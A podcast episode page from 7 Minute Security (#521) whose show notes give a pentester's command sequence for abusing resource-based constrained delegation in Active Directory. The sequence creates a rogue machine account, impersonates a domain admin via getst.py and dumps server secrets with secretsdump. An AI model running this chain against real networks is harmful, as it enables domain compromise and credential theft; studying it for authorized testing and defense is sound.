7MS #521: Tales of Pentest Pwnage - Part 36
7 Minute Security20 Mai 2022

7MS #521: Tales of Pentest Pwnage - Part 36

Hey friends! Today's another swell tale of pentest pwnage, and it's probably my favorite one yet (again)! This tale involves resource based constrained delegation, which is just jolly good evil fun! Here are my quick notes for pwning things using RBCD:

# From non-domain joined machine, get a cmd.exe running in the context of a user with ownership rights over a victim system: runas /netonly /user:domain\some.user cmd.exe # Make new machine account: New-MachineAccount -MachineAccount EVIL7MS -Password $(ConvertTo-SecureString 'Muah-hah-hah!' -AsPlainText -Force) -Verbose # Get the SID: $ComputerSid = Get-DomainComputer -Identity EVIL7MS -Properties objectsid | Select -Expand objectsid # Create raw descriptor for fake computer principal: $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))" $SDBytes = New-Object byte[] ($SD.BinaryLength) $SD.GetBinaryForm($SDBytes, 0) # Apply descriptor to victim machine: Get-DomainComputer SERVER-I-WANT-2-PWN | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose # Get a service ticket for the EVIL7MS box and impersonate a domain admin ("badmin") on the SERVER-I-WANT-2-PWN box: getst.py -spn cifs/SERVER-I-WANT-2-PWN -impersonate badmin -dc-ip 1.2.3.4 domain.com/EVIL7MS$:Muah-hah-hah! # Set the ticket export KRB5CCNAME=badmin.ccache # Dump victim server's secrets! secretsdump.py -debug k SERVER-I_WANT-2-PWN

Also, on the relaying front, I found this blog from TrustedSec as well as this article from LummelSec to be amazing resources.

Looking for an affordable resource to help you in your pentesting efforts? Check out our Light Pentest LITE: ebook Edition!

Episoder(713)

7MS #649: First Impressions of Twingate

7MS #649: First Impressions of Twingate

Today we take a look at a zero-trust / ditch-your-VPN solution called Twingate (not a sponsor but we'd like them to be)! It also doubles nicely as a primary or backup connection for your DIY pentest ...

8 Nov 20241h 12min

7MS #648: First Impressions of Level.io

7MS #648: First Impressions of Level.io

Hey friends, today I'm sharing my first (and non-sponsored) impressions of Level.io, a cool tool for managing Windows, Mac and Linux endpoints. It fits a nice little niche in our pentest dropbox deplo...

1 Nov 202440min

7MS #647: How to Succeed in Business Without Really Crying – Part 19

7MS #647: How to Succeed in Business Without Really Crying – Part 19

Today we're talkin' business – specifically how to make your report delivery meetings calm, cool and collect (both for you and the client!).

25 Okt 202422min

7MS #646: Baby's First Incident Response with Velociraptor

7MS #646: Baby's First Incident Response with Velociraptor

Hey friends, today I'm putting my blue hat on and dipping my toes in incident response by way of playing with Velociraptor, a very cool (and free!) tool to find evil in your environment. Perhaps even...

18 Okt 202416min

7MS #645: How to Succeed in Business Without Really Crying - Part 18

7MS #645: How to Succeed in Business Without Really Crying - Part 18

Today I do a short travelogue about my trip to Washington, geek out about some cool training I did with Velociraptor, ponder drowning myself in blue team knowledge with XINTRA LABS, and share some tho...

14 Okt 202431min

7MS #644: Tales of Pentest Pwnage – Part 64

7MS #644: Tales of Pentest Pwnage – Part 64

Hey! I'm speaking in Wanatchee, Washington next week at the NCESD conference about 7 ways to panic a pentester! Today's tale of pentest pwnage is a great reminder to enumerate, enumerate, enumerate!...

4 Okt 202441min

7MS #643: DIY Pentest Dropbox Tips – Part 11

7MS #643: DIY Pentest Dropbox Tips – Part 11

Today we continue where we left off in episode 641, but this time talking about how to automatically deploy and install a Ubuntu-based dropbox!  I also share some love for exegol as an all-in-one Acti...

27 Sep 202426min

7MS #642: Interview with Ron Cole of Immersive Labs

7MS #642: Interview with Ron Cole of Immersive Labs

Ron Cole of Immersive Labs joins us to talk pentest war stories, essential skills he learned while serving on a SOC, and the various pentest training and range platforms you can use to sharpen your se...

23 Sep 202442min

Populært innen Politikk og nyheter

giver-og-gjengen-vg
aftenpodden
forklart
i-retten
popradet
stopp-verden
aftenpodden-usa
lydartikler-fra-aftenposten
rss-gukild-johaug
det-store-bildet
fotballpodden-2
dine-penger-pengeradet
nokon-ma-ga
rss-ness
hanna-de-heldige
aftenbla-bla
frokostshowet-pa-p5
rss-penger-polser-og-politikk
e24-podden
rss-utenrikskomiteen-med-bogen-og-grasvik